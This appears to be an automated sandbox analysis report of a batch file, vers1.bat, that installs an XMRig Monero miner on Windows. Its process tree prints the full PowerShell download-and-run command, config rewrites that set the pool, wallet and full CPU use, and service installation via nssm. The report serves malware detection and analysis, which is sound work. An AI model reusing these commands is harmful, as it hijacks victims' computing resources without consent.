Analysis

  • max time kernel
    1049s
  • max time network
    1045s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240611-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25-06-2024 16:20

General

  • Target

    vers1.bat

  • Size

    393B

  • MD5

    ece9925dc634f1cc20e3fd7ff7a144bd

  • SHA1

    8816112e72b7b64a668bf7214999d855a7e05bde

  • SHA256

    a84009aa12f35d93284297647c2714df7f5b0a04d2e0732c689740920ea1421f

  • SHA512

    bf80fdf5fa8c00a0ddb773bed073d33b67bf6189b87b803f6fea7071e49dfdeb86cf2142175d9287fbc7bcfd639c42d848e9331f8bc7e68dacaaa33901432243

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/setup_moneroocean_miner.bat

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip

Signatures

  • XMRig Miner payload 54 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Blocklisted process makes network request 3 IoCs
  • Stops running service(s) 4 TTPs
  • Executes dropped EXE 9 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 13 IoCs

    Using powershell.exe command.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 18 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\vers1.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4872
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/setup_moneroocean_miner.bat', $tempfile); & $tempfile 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL; Remove-Item -Force $tempfile"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4112
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpDE4A.tmp.bat" 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4700
        • C:\Windows\system32\net.exe
          net session
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1516
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 session
            5⤵
              PID:4164
          • C:\Windows\system32\where.exe
            where powershell
            4⤵
              PID:3460
            • C:\Windows\system32\where.exe
              where find
              4⤵
                PID:1260
              • C:\Windows\system32\where.exe
                where findstr
                4⤵
                  PID:3416
                • C:\Windows\system32\where.exe
                  where tasklist
                  4⤵
                    PID:1984
                  • C:\Windows\system32\where.exe
                    where sc
                    4⤵
                      PID:3952
                    • C:\Windows\system32\sc.exe
                      sc stop moneroocean_miner
                      4⤵
                      • Launches sc.exe
                      PID:1224
                    • C:\Windows\system32\sc.exe
                      sc delete moneroocean_miner
                      4⤵
                      • Launches sc.exe
                      PID:5092
                    • C:\Windows\system32\taskkill.exe
                      taskkill /f /t /im xmrig.exe
                      4⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2020
                    • C:\Windows\system32\timeout.exe
                      timeout 5
                      4⤵
                      • Delays execution with timeout.exe
                      PID:2088
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip', 'C:\Users\Admin\xmrig.zip')"
                      4⤵
                      • Blocklisted process makes network request
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3928
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\xmrig.zip', 'C:\Users\Admin\moneroocean')"
                      4⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2832
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"donate-level\": *\d*,', '\"donate-level\": 1,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
                      4⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3824
                    • C:\Users\Admin\moneroocean\xmrig.exe
                      "C:\Users\Admin\moneroocean\xmrig.exe" --help
                      4⤵
                      • Executes dropped EXE
                      PID:4912
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
                      4⤵
                      • Suspicious use of WriteProcessMemory
                      PID:4844
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
                        5⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:2020
                        • C:\Windows\system32\HOSTNAME.EXE
                          "C:\Windows\system32\HOSTNAME.EXE"
                          6⤵
                            PID:1376
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"url\": *\".*\",', '\"url\": \"gulf.moneroocean.stream:10001\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
                        4⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:336
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"user\": *\".*\",', '\"user\": \"42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
                        4⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:5012
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"pass\": *\".*\",', '\"pass\": \"Pxhstppu\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
                        4⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2092
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"max-cpu-usage\": *\d*,', '\"max-cpu-usage\": 100,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
                        4⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:872
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"log-file\": *null,', '\"log-file\": \"C:\\Users\\Admin\\moneroocean\\xmrig.log\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
                        4⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4864
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config_background.json' | %{$_ -replace '\"background\": *false,', '\"background\": true,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config_background.json'"
                        4⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2828
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip', 'C:\Users\Admin\nssm.zip')"
                        4⤵
                        • Blocklisted process makes network request
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1944
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\nssm.zip', 'C:\Users\Admin\moneroocean')"
                        4⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2556
                      • C:\Windows\system32\sc.exe
                        sc stop moneroocean_miner
                        4⤵
                        • Launches sc.exe
                        PID:2188
                      • C:\Windows\system32\sc.exe
                        sc delete moneroocean_miner
                        4⤵
                        • Launches sc.exe
                        PID:736
                      • C:\Users\Admin\moneroocean\nssm.exe
                        "C:\Users\Admin\moneroocean\nssm.exe" install moneroocean_miner "C:\Users\Admin\moneroocean\xmrig.exe"
                        4⤵
                        • Executes dropped EXE
                        PID:1388
                      • C:\Users\Admin\moneroocean\nssm.exe
                        "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppDirectory "C:\Users\Admin\moneroocean"
                        4⤵
                        • Executes dropped EXE
                        PID:1608
                      • C:\Users\Admin\moneroocean\nssm.exe
                        "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppPriority BELOW_NORMAL_PRIORITY_CLASS
                        4⤵
                        • Executes dropped EXE
                        PID:4076
                      • C:\Users\Admin\moneroocean\nssm.exe
                        "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStdout "C:\Users\Admin\moneroocean\stdout"
                        4⤵
                        • Executes dropped EXE
                        PID:456
                      • C:\Users\Admin\moneroocean\nssm.exe
                        "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStderr "C:\Users\Admin\moneroocean\stderr"
                        4⤵
                        • Executes dropped EXE
                        PID:968
                      • C:\Users\Admin\moneroocean\nssm.exe
                        "C:\Users\Admin\moneroocean\nssm.exe" start moneroocean_miner
                        4⤵
                        • Executes dropped EXE
                        PID:4388
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=3456,i,16856304285138459032,14480077487839828721,262144 --variations-seed-version --mojo-platform-channel-handle=4460 /prefetch:8
                  1⤵
                    PID:1384
                  • C:\Users\Admin\moneroocean\nssm.exe
                    C:\Users\Admin\moneroocean\nssm.exe
                    1⤵
                    • Executes dropped EXE
                    PID:2336
                    • C:\Users\Admin\moneroocean\xmrig.exe
                      "C:\Users\Admin\moneroocean\xmrig.exe"
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of FindShellTrayWindow
                      PID:972
                  • C:\Windows\system32\taskmgr.exe
                    "C:\Windows\system32\taskmgr.exe" /4
                    1⤵
                    • Checks SCSI registry key(s)
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious behavior: GetForegroundWindowSpam
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of SendNotifyMessage
                    PID:4324
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=3424,i,16856304285138459032,14480077487839828721,262144 --variations-seed-version --mojo-platform-channel-handle=3792 /prefetch:8
                    1⤵
                      PID:1612

                    Network

                    MITRE ATT&CK Enterprise v15

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                      Filesize

                      2KB

                      MD5

                      2f57fde6b33e89a63cf0dfdd6e60a351

                      SHA1

                      445bf1b07223a04f8a159581a3d37d630273010f

                      SHA256

                      3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

                      SHA512

                      42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                      Filesize

                      1KB

                      MD5

                      5b5352c55a8e79ac8de4be3202d496a1

                      SHA1

                      4a263d9e36e5ef972e4b19035cae169e1df6459c

                      SHA256

                      eff52a77e2fd653199c31162fbd5557a83995ef0e6e0570bf6495d1b5386b3b8

                      SHA512

                      c4e5e245c427bc6f9cc95ae80efbd46fd432bea5a4f9366332b1850d833316e6f4eab0e25259b2ea39c40724dcae91ba748234cb1a3cf95b38d8fed162741d63

                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                      Filesize

                      1KB

                      MD5

                      b8e8fb4647b7f417e2b9fab7e0771c6f

                      SHA1

                      647fafa46d1b39b770d44abd472382ad426aad4a

                      SHA256

                      75f35d71544a8500bf1a444387ea5171257ca29017708b798ed5c4e518a0d6e3

                      SHA512

                      9080aa43b948079ab326f2511fedb721fc88d589c09cac6923ef12c4a4183e5c6e61ad7277db6a94bfa1ba66ceb839e6c974a5ffcc5791f653bbb55a1d171f9f

                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                      Filesize

                      1KB

                      MD5

                      454efddd54a88d0621fea1214ca22f6c

                      SHA1

                      98ba6c9f9ad05806bd052de48848f3c188d9aa83

                      SHA256

                      d9fab8d230e81bb1a8e5cb47fc548be6105bfbca981013a9c71206452c8b33a2

                      SHA512

                      8e5a3453de443b4f53b4ad730e9b60a9c9cee612f804a06ffc63190ce646b6adfd1ce487a34406eea46c5ddc0178318c1610909781b6e32764c0af4be0f70b3b

                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                      Filesize

                      1KB

                      MD5

                      aedbc260345ed946fbc80c39899d775d

                      SHA1

                      87b77659b7725f6e54fc77131f1955b16d1bf525

                      SHA256

                      00f595576a8d0c7d7c29fe000d9d7985feaf3ef8ced0fb72cc61572a10fd91e5

                      SHA512

                      933d795b0ed3fab3ab2aab5cd7f61ea60faf55767413e6c26920ebaa149c51b523b61932b6c8595baeb4d0be537e800c585f961b5b403fc8116d40a8433c7603

                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                      Filesize

                      1KB

                      MD5

                      633da34a38638896c9a56c65a984d48a

                      SHA1

                      1ecc48e2ec10396bbe8972facf94a28d4a20635b

                      SHA256

                      2fa8e367aeb35f24f88785d48e2058b217aa3479e61c65d25a94be0d73c98dfa

                      SHA512

                      79ee129be3599bb324d25e6c58c2b685499cb401d24860431dead811cc70841d892a24554398e65dc4e47e997e2e2c569d4f3a7cf38cedd36088897314e7d1fe

                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                      Filesize

                      1KB

                      MD5

                      312750333eb20662ea11eaccc7d090e9

                      SHA1

                      555baaa1371c72cf783363ddb3fd468e8e2d7295

                      SHA256

                      b114a1ad145c1dc0ccb9fa7499e08a603fed6740e25dfbd455af1d16c3514a93

                      SHA512

                      a999b05bb5269da27847736e28f84126a1c46958078d367a048e173c2d429e35e39efdebc378fdf3684ac5598be91926960586afd940a9bea58de7a51817ffb2

                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                      Filesize

                      1KB

                      MD5

                      0cd0d16925fb1c1252ce6ce726c3f8db

                      SHA1

                      6baa64dfcbd6c5155dedd632df319b78031d1dd8

                      SHA256

                      f29556d9799cce3a641e96c5ed51ea12276e171f35e4df1c7a17140026763106

                      SHA512

                      ba799193cc475cebf79951fc7dfa2a5523074c24cdabcdc024e13ee7b9215ddb69c5589b8a1fc5bdb3b270463a5e43a5d87e930157abc63415cd0dc1a4c3a490

                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                      Filesize

                      1KB

                      MD5

                      042323759662130763b90102081537f5

                      SHA1

                      3cdbc496f7e7a1c512a808fbbe88e7f724b04153

                      SHA256

                      5820f07295975657fc430bb9a7e3f75849ac3b0def9b4edba24d5105e5eed61e

                      SHA512

                      6ee211d6264ab0ec505d6dbfb57d4778dce7818280c71dc6df58d2d051276242b6ea28615b7dd45f9dec0153b6d2aac5949aba1ee87f73f4bf1905f3e082070f

                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                      Filesize

                      1KB

                      MD5

                      6c4805e00673bef922d51b1a7137028f

                      SHA1

                      0eabb38482d1733dd85a2af9c5342c2cafcd41eb

                      SHA256

                      7af7d25fe7e3bb8b75bcffaa8573e2e9af7e7f70a840fa8bc0196d0ab396ecdd

                      SHA512

                      eb6dacb4e0da6f45028ebf65ebffdc6aecdb6a34a582bb69aa5836ef02a7115f6b500ef2dd6a2c2be994ec9d0cbbff564368724593666105d3d4475441830cc1

                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                      Filesize

                      1KB

                      MD5

                      68934f3f08ec215f81367aa0dcafccb5

                      SHA1

                      ee64d26c0e324f59ca0fb2b7fc0808cfb985be0a

                      SHA256

                      3adf0bd133b877436dcb6d441b5e5991f56feac0e8370e5f821fcd2d248577a5

                      SHA512

                      5c823017241a83f067ef9ad1020d879b5108be8cb8e4422f1abf079c67c2871d90fbd45446946860bc45dfac6f8d71bafef00c125269f28aa9980873e8247b5d

                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                      Filesize

                      1KB

                      MD5

                      67460fee553c1dacde2b8106efaf9228

                      SHA1

                      b1869d1107bcf8bd90bca28f5ea8c41495b149a5

                      SHA256

                      598636ebfbb03936562cc724b0ba0db2bda6fd8fbb5f14a9e502f0490cca0f7d

                      SHA512

                      fd4b9961ead2bb13856209199819dd0fcd36913615e1dfcb1c07d5fd42ee3bfc005b0d580431c7fc48524e3bf90527b7a3e5028f9b729d774bfacd29c65deb71

                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                      Filesize

                      64B

                      MD5

                      7e3031eb24873f52a92a5f3708a9ae05

                      SHA1

                      a6ee095827b6caaa9db7ef42a167317a86f1daef

                      SHA256

                      da5d99165b346e394155151ec0f1c7468cab5d4368bbe75985343d7afc41ce15

                      SHA512

                      71d8ac3637d73b370e3a973f351e6d107aacd87dda654d1d9884a58e13c85ee9d596aa8801b4a2c6bdf47209b74f2356e92ed5bc3707a153e41f40dc713a6773

                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tvdtjbot.cqk.ps1

                      Filesize

                      60B

                      MD5

                      d17fe0a3f47be24a6453e9ef58c94641

                      SHA1

                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                      SHA256

                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                      SHA512

                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                    • C:\Users\Admin\AppData\Local\Temp\tmpDE4A.tmp.bat

                      Filesize

                      14KB

                      MD5

                      012a668bd1043d6b0a4bcd03d02ded41

                      SHA1

                      8595831d19a06d5ad38cb38b793eb1bdcc16b816

                      SHA256

                      57375e5d331ed567ca2da98b126ac585ff7829d15c31ad98eb452339e3ba1d05

                      SHA512

                      e43947f10872db119daa4f28c70046941602831a8e8a871ccad45f8712a972d76b31a05282de7f4bc99d2e23fe40ef9dceaef3ea84b7c6532b85fee920269792

                    • C:\Users\Admin\moneroocean\config.json

                      Filesize

                      2KB

                      MD5

                      725d38d9eeadc9c2691063936b01f9ec

                      SHA1

                      153fd5bd55cfd845516562291a7ab867d68145b5

                      SHA256

                      0df3cdd812a582b5ddf5c8019fe7aecf03edb5760f4cf2d0c81ba73590a2ec43

                      SHA512

                      fe2758ddaa974696c733367d479dc54695ee1f177275f3b26d575b3c27b8c968b6bab0ce1e5b715e6513d1f39d880462b3d8cc542507f2eeae531a9a6d337658

                    • C:\Users\Admin\moneroocean\config.json

                      Filesize

                      2KB

                      MD5

                      64cafb884608c751a2bccaca7c582e0f

                      SHA1

                      924f71ecb4903ab63a13a125e62fd6e5f5d20cb2

                      SHA256

                      3250e852f2fb3e61bd0642d92f1decac666777da7c4d59d6270ee49fc856151b

                      SHA512

                      ddd68d3d13bd65f926f6be67ac891c143d6e282ee955871382452f2627ca42ed54e7363d83651b904cdf8054bc1d12a02becd44ac1b5cdc98ac42fc7ebfe97a0

                    • C:\Users\Admin\moneroocean\config.json

                      Filesize

                      2KB

                      MD5

                      e83e17e1e4b9a100377ebbbaffc806ff

                      SHA1

                      901fad9aac42e558d0271ec75c953638aed1e581

                      SHA256

                      b0ebbb098c8d6f19fbfb74cf26f41becc82c414dad3e210a79aaf384e9ee179a

                      SHA512

                      05c308762c1ea7d0049d011afed694aa108e9ad2481cca169caa62571e193896c2dd3945be115e46df8b80247e0c210718989289d0de9c12012530123b646e06

                    • C:\Users\Admin\moneroocean\config.json

                      Filesize

                      2KB

                      MD5

                      66e75e8b22204045c845758569a31875

                      SHA1

                      e50d9bbedede85c156046a3d5adefd1b1239d79d

                      SHA256

                      e2a4bab85e9bd3367be5894a56891371cc47fdbfd64d2655c7f2424007a71ff2

                      SHA512

                      d5aaa63156a8401a046e0a3101a9de6f191ec7f9729cb4999769602aa13a5d5312b04b007d8aebc2d4ee31af07760711d52facad29b3253aaa1cdc158a195f66

                    • C:\Users\Admin\moneroocean\config.json

                      Filesize

                      2KB

                      MD5

                      c9ef9c214996db3d88f571226910c5d5

                      SHA1

                      420ba30247b1e09f706557a7704a1ebee5d3165c

                      SHA256

                      fa55a24dccbf28309642d958cbb73f5053e3a56baa0eda22d4581e0151f5f7c1

                      SHA512

                      de91ef4268e67c4fa8d7216637bd9ca69ea33b108352675c954d4719d2d58b9414df78c6ebc8f622fcfbeda4ad5f981c2a17a48f7eeae8626cefe5b6894ec68d

                    • C:\Users\Admin\moneroocean\nssm.exe

                      Filesize

                      360KB

                      MD5

                      1136efb1a46d1f2d508162387f30dc4d

                      SHA1

                      f280858dcfefabc1a9a006a57f6b266a5d1fde8e

                      SHA256

                      eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848

                      SHA512

                      43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5

                    • C:\Users\Admin\moneroocean\xmrig.exe

                      Filesize

                      9.0MB

                      MD5

                      9ee2c39700819e5daab85785cac24ae1

                      SHA1

                      9b5156697983b2bdbc4fff0607fadbfda30c9b3b

                      SHA256

                      e7c13a06672837a2ae40c21b4a1c8080d019d958c4a3d44507283189f91842e3

                      SHA512

                      47d81ff829970c903f15a791b2c31cb0c6f9ed45fdb1f329c786ee21b0d1d6cd2099edb9f930824caceffcc936e222503a0e2c7c6253718a65a5239c6c88b649

                    • C:\Users\Admin\nssm.zip

                      Filesize

                      135KB

                      MD5

                      7ad31e7d91cc3e805dbc8f0615f713c1

                      SHA1

                      9f3801749a0a68ca733f5250a994dea23271d5c3

                      SHA256

                      5b12c3838e47f7bc6e5388408a1701eb12c4bbfcd9c19efd418781304590d201

                      SHA512

                      d7d947bfa40d6426d8bc4fb30db7b0b4209284af06d6db942e808cc959997cf23523ffef6c44b640f3d8dbe8386ebdc041d0ecb5b74e65af2c2d423df5396260

                    • C:\Users\Admin\xmrig.zip

                      Filesize

                      3.5MB

                      MD5

                      640be21102a295874403dc35b85d09eb

                      SHA1

                      e8f02b3b8c0afcdd435a7595ad21889e8a1ab0e4

                      SHA256

                      ed33e294d53a50a1778ddb7dca83032e9462127fce6344de2e5d6be1cd01e64b

                      SHA512

                      ece0dfe12624d5892b94d0da437848d71b16f7c57c427f0b6c6baf757b9744f9e3959f1f80889ffefcb67a755d8bd7a7a63328a29ac9c657ba04bbdca3fea83e

                    • memory/972-243-0x0000000000400000-0x000000000102B000-memory.dmp

                      Filesize

                      12.2MB

                    • memory/972-249-0x0000000000400000-0x000000000102B000-memory.dmp

                      Filesize

                      12.2MB

                    • memory/972-268-0x0000000000400000-0x000000000102B000-memory.dmp

                      Filesize

                      12.2MB

                    • memory/972-267-0x0000000000400000-0x000000000102B000-memory.dmp

                      Filesize

                      12.2MB

                    • memory/972-266-0x0000000000400000-0x000000000102B000-memory.dmp

                      Filesize

                      12.2MB

                    • memory/972-265-0x0000000000400000-0x000000000102B000-memory.dmp

                      Filesize

                      12.2MB

                    • memory/972-264-0x0000000000400000-0x000000000102B000-memory.dmp

                      Filesize

                      12.2MB

                    • memory/972-263-0x0000000000400000-0x000000000102B000-memory.dmp

                      Filesize

                      12.2MB

                    • memory/972-262-0x0000000000400000-0x000000000102B000-memory.dmp

                      Filesize

                      12.2MB

                    • memory/972-200-0x0000000000400000-0x000000000102B000-memory.dmp

                      Filesize

                      12.2MB

                    • memory/972-201-0x0000000000400000-0x000000000102B000-memory.dmp

                      Filesize

                      12.2MB

                    • memory/972-202-0x0000000000400000-0x000000000102B000-memory.dmp

                      Filesize

                      12.2MB

                    • memory/972-203-0x0000000000400000-0x000000000102B000-memory.dmp

                      Filesize

                      12.2MB

                    • memory/972-204-0x0000000000400000-0x000000000102B000-memory.dmp

                      Filesize

                      12.2MB

                    • memory/972-205-0x0000000000400000-0x000000000102B000-memory.dmp

                      Filesize

                      12.2MB

                    • memory/972-206-0x0000000000400000-0x000000000102B000-memory.dmp

                      Filesize

                      12.2MB

                    • memory/972-261-0x0000000000400000-0x000000000102B000-memory.dmp

                      Filesize

                      12.2MB

                    • memory/972-260-0x0000000000400000-0x000000000102B000-memory.dmp

                      Filesize

                      12.2MB

                    • memory/972-259-0x0000000000400000-0x000000000102B000-memory.dmp

                      Filesize

                      12.2MB

                    • memory/972-258-0x0000000000400000-0x000000000102B000-memory.dmp

                      Filesize

                      12.2MB

                    • memory/972-257-0x0000000000400000-0x000000000102B000-memory.dmp

                      Filesize

                      12.2MB

                    • memory/972-256-0x0000000000400000-0x000000000102B000-memory.dmp

                      Filesize

                      12.2MB

                    • memory/972-255-0x0000000000400000-0x000000000102B000-memory.dmp

                      Filesize

                      12.2MB

                    • memory/972-254-0x0000000000400000-0x000000000102B000-memory.dmp

                      Filesize

                      12.2MB

                    • memory/972-253-0x0000000000400000-0x000000000102B000-memory.dmp

                      Filesize

                      12.2MB

                    • memory/972-252-0x0000000000400000-0x000000000102B000-memory.dmp

                      Filesize

                      12.2MB

                    • memory/972-251-0x0000000000400000-0x000000000102B000-memory.dmp

                      Filesize

                      12.2MB

                    • memory/972-250-0x0000000000400000-0x000000000102B000-memory.dmp

                      Filesize

                      12.2MB

                    • memory/972-223-0x0000000000400000-0x000000000102B000-memory.dmp

                      Filesize

                      12.2MB

                    • memory/972-224-0x0000000000400000-0x000000000102B000-memory.dmp

                      Filesize

                      12.2MB

